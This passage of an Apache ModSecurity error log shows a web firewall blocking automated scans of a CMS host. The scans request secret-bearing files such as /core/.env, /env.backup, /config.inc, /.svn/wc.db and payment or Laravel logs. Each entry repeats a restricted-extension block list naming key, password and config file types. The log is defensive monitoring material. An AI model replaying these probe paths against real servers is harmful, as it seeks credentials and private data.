2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.inc"] [unique_id "aa4qsb8eGXOlBYlBBTDRGgAAAYs"] [Mon Mar 09 04:04:34.045519 2026] [:error] [pid 7058:tid 7071] [client 185.177.72.60:17362] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config.inc"] [unique_id "aa4qsrwNmNAC0qtA2OKPbAAAAcU"] [Mon Mar 09 04:04:36.260614 2026] [:error] [pid 6189:tid 6276] [client 185.177.72.60:17948] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aa4qtL9XfEPQnqdBGl0sqwAAAQ0"] [Mon Mar 09 04:04:36.389820 2026] [:error] [pid 7259:tid 7284] [client 185.177.72.60:17216] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aa4qtJifH2twR9cBzzfxLAAAAhE"] [Mon Mar 09 04:04:36.424076 2026] [:error] [pid 6189:tid 6262] [client 185.177.72.60:17948] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aa4qtL9XfEPQnqdBGl0srAAAAQA"] [Mon Mar 09 04:04:36.442160 2026] [:error] [pid 7259:tid 7289] [client 185.177.72.60:17216] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "aa4qtJifH2twR9cBzzfxLQAAAhY"] [Mon Mar 09 04:04:36.521390 2026] [:error] [pid 7259:tid 7275] [client 185.177.72.60:17216] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "aa4qtJifH2twR9cBzzfxMAAAAgg"] [Mon Mar 09 04:04:36.814195 2026] [:error] [pid 7058:tid 7066] [client 185.177.72.60:17378] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aa4qtLwNmNAC0qtA2OKPgAAAAcA"] [Mon Mar 09 04:04:36.883379 2026] [:error] [pid 7259:tid 7290] [client 185.177.72.60:17730] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aa4qtJifH2twR9cBzzfxNAAAAhc"] [Mon Mar 09 04:04:36.895087 2026] [:error] [pid 6734:tid 6741] [client 185.177.72.60:17794] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aa4qtEyJ0iyCmxAaPczHqQAAAUA"] [Mon Mar 09 04:04:36.955363 2026] [:error] [pid 7058:tid 7073] [client 185.177.72.60:17708] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "aa4qtLwNmNAC0qtA2OKPgQAAAcc"] [Mon Mar 09 04:04:36.963387 2026] [:error] [pid 7259:tid 7289] [client 185.177.72.60:17876] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "aa4qtJifH2twR9cBzzfxNgAAAhY"] [Mon Mar 09 17:05:01.858001 2026] [:error] [pid 6734:tid 6765] [client 176.65.148.161:59736] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aa7hnUyJ0iyCmxAaPcwIUQAAAVg"] [Mon Mar 09 17:05:01.862100 2026] [:error] [pid 6874:tid 6888] [client 176.65.148.161:59730] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aa7hnb8eGXOlBYlBBTCDJQAAAYg"] [Mon Mar 09 17:05:09.918454 2026] [:error] [pid 7058:tid 7087] [client 176.65.148.161:52016] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aa7hpbwNmNAC0qtA2OLlkQAAAdU"] [Mon Mar 09 17:05:09.963454 2026] [:error] [pid 7259:tid 7275] [client 176.65.148.161:52018] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aa7hpZifH2twR9cBzzejgAAAAgg"] [Tue Mar 10 17:37:43.800155 2026] [:error] [pid 28726:tid 28739] [client 45.148.10.160:60268] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "abA6x7rm3fD64nkDJhKjswAAAQA"] [Tue Mar 10 17:38:58.986754 2026] [:error] [pid 10026:tid 10038] [client 45.148.10.160:46566] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "abA7EncalDvAPD3jRjI0uAAAAMo"] [Tue Mar 10 17:39:04.888471 2026] [:error] [pid 9892:tid 9963] [client 45.148.10.160:47392] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "abA7GLWjczeDA5uCWAAo1gAAAJA"] [Tue Mar 10 17:39:10.767134 2026] [:error] [pid 10026:tid 10046] [client 45.148.10.160:43552] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "abA7HncalDvAPD3jRjI1DQAAANI"] [Tue Mar 10 17:41:41.486587 2026] [:error] [pid 8091:tid 8113] [client 45.148.10.160:51288] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "abA7tfMmESTk3DzpxpPAEwAAAVM"] [Tue Mar 10 20:03:10.080340 2026] [access_compat:error] [pid 10026:tid 10045] [client 137.184.254.164:58434] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/packages [Tue Mar 10 20:03:12.322427 2026] [access_compat:error] [pid 10026:tid 10052] [client 137.184.254.164:58434] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/vendor/laravel-filemanager [Tue Mar 10 20:03:22.999928 2026] [access_compat:error] [pid 8091:tid 8097] [client 137.184.254.164:42550] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Tue Mar 10 23:50:03.245787 2026] [:error] [pid 8091:tid 8116] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 256 byte(s) in ARGS:binary_kqjtvnos outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVrQAAAVY"] [Tue Mar 10 23:50:03.264056 2026] [:error] [pid 8091:tid 8114] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 237 byte(s) in ARGS:binary_sbwfxyea outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCSC_MmESTk3DzpxpNVrgAAAVQ"] [Tue Mar 10 23:50:03.282290 2026] [:error] [pid 8091:tid 8103] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 215 byte(s) in ARGS:binary_hfiowaja outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "abCSC_MmESTk3DzpxpNVrwAAAUk"] [Tue Mar 10 23:50:03.300990 2026] [:error] [pid 8091:tid 8111] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 258 byte(s) in ARGS:binary_uwitmhfi outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "abCSC_MmESTk3DzpxpNVsAAAAVE"] [Tue Mar 10 23:50:03.319081 2026] [:error] [pid 8091:tid 8102] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 253 byte(s) in ARGS:binary_spdxdvzg outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "abCSC_MmESTk3DzpxpNVsQAAAUg"] [Tue Mar 10 23:50:03.337399 2026] [:error] [pid 8091:tid 8104] [client 45.148.10.62:48596] [client 45.148.10.62] ModSecurity: Access denied with code 403 (phase 2). Found 250 byte(s) in ARGS:binary_kpkbstum outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "abCSC_MmESTk3DzpxpNVsgAAAUo"] [Tue Mar 10 23:50:03.356095 2026] [:error] [pid 8091:tid 8117] [client 45.148.10.62:48596] [client 45.148.10.62] 